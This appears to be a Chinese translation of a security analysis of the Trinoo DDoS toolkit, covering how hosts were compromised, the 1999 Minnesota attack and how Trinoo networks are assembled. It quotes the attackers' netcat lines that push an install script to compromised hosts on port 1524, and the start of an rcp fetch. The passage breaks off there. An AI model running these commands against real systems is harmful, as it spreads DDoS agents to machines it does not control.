DDoS攻击工具——Trinoo 分析.docVIP

DDoS攻击工具——Trinoo 分析 简介 -------- 本文是对拒绝服务攻击工具包trinoo中主/从程序服务器的一些分析。 Trinoo守护程序的二进制代码包最初是在一些Solaris 2.x主机中发现的，这些主机是被攻击者利用RPC服务安全漏洞statd、cmsd和ttdbserverd入侵的。关于这些漏洞的详细资料请参阅CERT事件记录99-04： /incident_notes/IN-99-04.html 最初的trinoo守护程序来源于某些基于UDP协议和有访问控制的远程命令shell，并很有可能附带有能自动记录的嗅探器(sniffer)。 在研究这个工具包的过程中，捕获到了Trinoo攻击网络的安装过程及一些源代码。我们就是利用这些捕获到的源代码进入了深入的分析。 对这些源代码的任何修改，如提示、口令、命令、TCP/UDP端口号或所支持的攻击方法、签名和具体功能，都可能使分析的结果与本文不同。 该守护程序是在Solaris 2.5.1和Red Hat Linux 6.0上编译并运行。主服务器 (master) 在Red Hat Linux 6.0上编译和运行。但也许守护程序和主服务器都可在其它同类平台中使用。 Trinoo网络可能包含几百、甚至几千台已被入侵的互联网主机组成。这些主机很可能都被装上了各种后门以方便再次进入系统。 在1999年8月17日，一个由至少227台主机（其中114台属于Internet2主机）组成的trinoo网络攻击了位于明尼苏达(Minnessota)大学的一台主机，其结果是该主机网络崩溃超过两天。而在调查这次攻击期间，又有至少16台其它主机被攻击，其中包括了一些美国以外的主机。（请参阅附录D以了解此次trinoo攻击的报告。 攻 击 过 程 ----------- 一次典型的攻击过程很可能是这样的： 1）一个盗取来的帐号被用于编译各种扫描工具、攻击工具（如缓冲区溢出程序）、rootkit和sniffer、trinoo守护程序、主服务器、入侵主机、目标主机清单等等。这个系统往往是一些拥有很多用户、存在管理漏洞和具有高速连接速率（以进行文件传输）的大型主机系统。 2）然后对一个大范围的网络进行扫描以确定潜在的入侵目标。最有可能的是那些可能存在各种远程缓冲区溢出漏洞的主机，如wu-ftpd、RPC服务(cmsd, statd,ttdbserverd,amd）等。这些主机的操作系统最好是Sun Solaris 2.x和Linux，以便充分利用各种现成的rootkits和后门程序等。如果是其它系统则可用来保存工具和记录。 3）在得到入侵主机清单后，编写实现入侵攻击、监听TCP端口（通常为1524ingreslock）和连接到该端口以确定入侵成功的脚本程序。或者通过发送电子邮件到一个免费WEB邮箱以确认已入侵该主机。 入侵完成后将产生一个被控制主机清单，这些主机将被用于放置后门、sniffer或trinoo守护程序或trinoo主服务器。 4）从已入侵系统清单中选出满足建立trinoo网络需要的主机，放置已编译好的trinoo守护程序。 5）最后，运行DoS攻击脚本，该脚本根据上面建立的被入侵主机清单，生成另外的脚本程序，在后台以最快的速度自动安装。脚本使用netcat将shell脚本发送到被入侵主机的1524/tcp端口。 --------------------------------------------------------------------------- ./trin.sh | nc 128.aaa.167.217 1524 ./trin.sh | nc 128.aaa.167.218 1524 ./trin.sh | nc 128.aaa.167.219 1524 ./trin.sh | nc 128.aaa.187.38 1524 ./trin.sh | nc 128.bbb.2.80 1524 ./trin.sh | nc 128.bbb.2.81 1524 ./trin.sh | nc 128.bbb.2.238 1524 ./trin.sh | nc 128.ccc.12.22 1524 ./trin.sh | nc 128.ccc.12.50 1524 . . . --------------------------------------------------------------------------- 其中的trin.sh脚本产生如下输出： --------------------------------------------------------------------------- echo rcp :leaf /usr/